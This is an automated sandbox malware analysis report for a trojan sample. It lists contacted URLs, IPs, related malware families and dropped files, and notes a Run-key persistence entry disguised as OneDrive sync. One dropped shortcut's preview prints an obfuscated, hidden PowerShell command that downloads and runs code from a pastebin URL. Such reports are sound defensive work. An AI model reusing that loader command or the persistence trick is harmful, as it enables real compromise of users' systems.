https://contoso.com/License | powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://discord.com | powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.comx | powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com | powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tinyurl.com | powershell.exe, 00000007.00000002.1650878851.0000019380225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B41D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://raw.githubusercontent.com | powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://raw.githubuserconte | powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pastebin.comp6 | powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://cicro.com | powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DC9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pastebin.com | powershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pastebin.com | powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
104.18.111.161 | tinyurl.com | United States | 13335 | CLOUDFLARENETUS | false
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534111
Start date and time: 2024-10-15 15:58:56 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5UIy3bo46y.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original Sample Name: 0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3.exe
Detection: MAL
Classification: mal100.troj.evad.winDLL@37/19@7/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 14
• Number of non-executed functions: 1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.101.57.9, 13.95.65.251
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6448 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                • VT rate limit hit for: 5UIy3bo46y.dll
Time | Type | Description
10:00:06 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
10:00:08 | API Interceptor | 1000x Sleep call for process: powershell.exe modified
16:00:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
16:00:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: 104.20.3.235
• Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
• BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
• sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
• SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
• sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
• New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Match: 185.199.109.133
• OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
• steamcodegenerator.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
• SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
• SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: tinyurl.com
• BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
• https://tinyurl.com/y9r5fvas | malicious | Unknown | 104.17.112.233
• https://tinyurl.com/5xa2ubd7 | malicious | Unknown | 104.17.112.233
• SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
• SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
• SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | 104.18.111.161
• balcao242609.vbs | malicious | Unknown | 104.18.111.161
• https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsA | malicious | Unknown | 104.17.112.233
• http://tinyurl.com/fresn30d39d | malicious | Unknown | 104.17.112.233
• https://tinyurl.com/NDCEurope | malicious | Unknown | 104.18.111.161
Match: discord.com
• Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
• cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
• OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
• BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
• gaber.ps1 | malicious | Unknown | 162.159.137.232
• cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
• steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
• cr_asm.ps1 | malicious | Unknown | 162.159.138.232
• Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
• Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: CLOUDFLARENETUS
• Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
• gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
• cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
• OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
• BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
• gaber.ps1 | malicious | Unknown | 162.159.137.232
• cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
• steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
• cr_asm.ps1 | malicious | Unknown | 162.159.138.232
• HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
Match: FASTLYUS
• Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133
• cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
• OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
• BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
• gaber.ps1 | malicious | Unknown | 185.199.108.133
• cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
• steamcodegenerator.exe | malicious | Unknown | 185.199.111.133
• cr_asm.ps1 | malicious | Unknown | 185.199.108.133
• https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 151.101.1.229
• na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
Associated Sample Name / URL | Detection | Threat Name | Context (grouped by Match)
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• Lm9IJ4r9oO.exe | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 185.199.109.133, 162.159.128.233
• cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 104.20.3.235, 185.199.109.133, 162.159.128.233
• OSLdZanXNc.exe | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• gaber.ps1 | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• cr_asm_crypter.ps1 | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• steamcodegenerator.exe | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• cr_asm.ps1 | malicious | Unknown | 104.20.3.235, 185.199.109.133, 162.159.128.233
• https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 104.20.3.235, 185.199.109.133, 162.159.128.233
                                                                No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
                                                                Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllula/L:NllUa/
MD5: 007169766845EC5A2BD6BD299E76CB51
SHA1: 512122CA3553CEAEB92B26F864DBF34D65318F46
SHA-256: D5D8FC318BB03710293754D82EEBA8FBA87DA20E06A077379D05021F53EEDCFA
SHA-512: E1E61D589789A166DD54BB73E327337343C161BE61907D02CC9859BFEDFC310467C8CB0678E0CBAD2BA38E887C8855914579CAB66DAB1B481EBF92C8EA7601A8
Malicious: false
                                                                Preview:@...e...............................R................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
